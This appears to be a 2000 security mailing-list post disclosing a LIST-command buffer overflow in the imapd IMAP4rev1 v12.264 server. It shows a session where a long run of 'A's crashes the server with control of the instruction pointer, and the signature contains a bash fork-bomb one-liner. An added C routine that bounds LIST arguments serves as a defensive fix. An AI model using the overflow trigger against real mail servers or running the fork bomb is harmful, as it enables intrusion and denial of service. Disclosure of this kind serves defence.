Subject: imapd4r1 v12.264
From: Michal Zalewski (lcamtufDIONE.IDS.PL)
Date: Sun Apr 16 2000 - 07:19:43 CDT

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


Privileges seem to be dropped, but, anyway, it's a nice way to get shell
access to a mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need a code security audit.

Michal Zalewski [lcamtuftpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

This message came from the list <securemud.pl>
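
An added example, not part of the original post and not imapd's code: a pre-parse check that bounds the two LIST arguments (reference and mailbox pattern) before anything copies them into fixed-size storage, which is the class of check the crash above points to. The 255-byte limit, the function names and the return codes are assumptions made for this example; IMAP literals ({n}) are not handled and are treated as plain atoms.

```c
#include <stddef.h>
#include <strings.h>   /* strncasecmp (POSIX) */

#define ARG_MAX_LEN 255   /* assumed limit for this example, not taken from imapd */

enum list_check { LIST_OK = 0, LIST_NOT_LIST = 1, LIST_MALFORMED = -1, LIST_TOO_LONG = -2 };

/* Read one atom or "quoted string" starting at *p. Stores its length
 * (quotes and escape backslashes excluded) in *len and advances *p past it.
 * Returns 0 on success, -1 on an empty token or an unterminated quote. */
static int next_arg(const char **p, size_t *len)
{
    const char *s = *p;
    size_t n = 0;
    while (*s == ' ') s++;
    if (*s == '"') {
        s++;
        while (*s && *s != '"') {
            if (*s == '\\' && s[1]) s++;   /* skip the escape, count the char */
            s++; n++;
        }
        if (*s != '"') return -1;          /* ran off the end of the line */
        s++;
    } else {
        while (*s && *s != ' ' && *s != '\r' && *s != '\n') { s++; n++; }
        if (n == 0) return -1;
    }
    *p = s; *len = n;
    return 0;
}

/* Check "<tag> LIST <reference> <mailbox>" without copying any of it. */
enum list_check check_list_line(const char *line)
{
    const char *p = line, *cmd;
    size_t len;
    if (next_arg(&p, &len) != 0) return LIST_MALFORMED;        /* tag */
    while (*p == ' ') p++;
    cmd = p;
    if (next_arg(&p, &len) != 0) return LIST_MALFORMED;        /* command */
    if (len != 4 || strncasecmp(cmd, "list", 4) != 0) return LIST_NOT_LIST;
    for (int i = 0; i < 2; i++) {                              /* reference, mailbox */
        if (next_arg(&p, &len) != 0) return LIST_MALFORMED;
        if (len > ARG_MAX_LEN) return LIST_TOO_LONG;           /* reject, never truncate */
    }
    return LIST_OK;
}
```

A server or filtering proxy would answer LIST_TOO_LONG and LIST_MALFORMED with a tagged BAD response and log the client address, rather than passing the line on to the command handler.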